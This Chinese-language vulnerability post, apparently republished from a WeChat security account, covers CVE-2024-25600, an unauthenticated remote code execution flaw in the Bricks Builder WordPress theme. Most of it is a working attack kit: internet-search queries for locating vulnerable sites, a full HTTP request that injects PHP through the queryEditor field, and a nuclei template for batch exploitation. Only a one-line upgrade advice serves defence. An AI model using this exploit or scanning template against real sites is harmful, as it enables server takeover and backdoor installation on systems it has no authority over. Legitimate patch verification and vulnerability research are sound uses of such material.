免责声明
文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
产品简介
Bricks Builder是一款用于WordPress的开发主题,提供直观的拖放界面,用于设计和构建WordPress网站。它使用户能够轻松创建自定义的网页布局和设计,无需编写或了解复杂的代码。Bricks Builder具有用户友好的界面和强大的功能,使用户可以通过简单的拖放操作添加、编辑和排列各种网页元素,例如文本框、图像、按钮、导航菜单等。它为WordPress用户提供了一种直观且便捷的方式来构建专业和吸引人的网站,无论是个人博客、商业网站还是电子商务平台。
漏洞描述
WordPres 默认配置安装的 Brick Builder 主题在低于<= 1.9.6版本中存在远程代码执行漏洞,是由 "prepare_query_vars_from_settings "函数中的一个 eval 函数错误调用导致的,未经身份验证的威胁攻击者可利用该函数执行任意 PHP 代码,写入后门文件获取服务器权限。
影响版本
Bricks Builder <= 1.9.6
网络测绘
FOFA网络测绘搜索
body="/wp-content/themes/bricks/"
鹰图网络测绘搜索
web.body="/wp-content/themes/bricks/"
漏洞复现
WordPress插件:Burp POC:
GET请求获取到nonce值:
通过POST请求构造POC实现RCE:
POST /wp-json/bricks/v1/render_element HTTP/2
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Content-Length: 360
Cookie: 1
Content-Type: application/json
Accept-Encoding: gzip
{
"postId": "1",
"nonce": "nonce值",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}
nuclei模板批量验证:
id: CVE-2024-25600
info:
name: WordPress Bricks RCE
author: Ts3a
severity: high
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600
- https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd/
- https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
- https://github.com/Chocapikk/CVE-2024-25600
- https://op-c.net/blog/cve-2024-25600-wordpresss-bricks-builder-rce-flaw-under-active-exploitation
tags: wpscan,cve,cve2024,wordpress,wp-plugin,wp,rce,unauth
requests:
- raw:
- |
GET / HTTP/2
Host: {{Hostname}}
- |
POST /wp-json/bricks/v1/render_element HTTP/2
Host: {{Hostname}}
Content-Type: application/json
{
"postId": "1",
"nonce": "{{nonce}}",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}
matchers:
- type: word
words:
- "Exception:"
- "uid"
part: body
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- 'nonce":"([0-9a-z]+)'
internal: true
修复方案
升级版本至1.9.61或更高版本
原文始发于微信公众号(划水但不摆烂):【漏洞情报 | 新】WordPres Bricks Builder 前台RCE漏洞(CVE-2024-25600)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论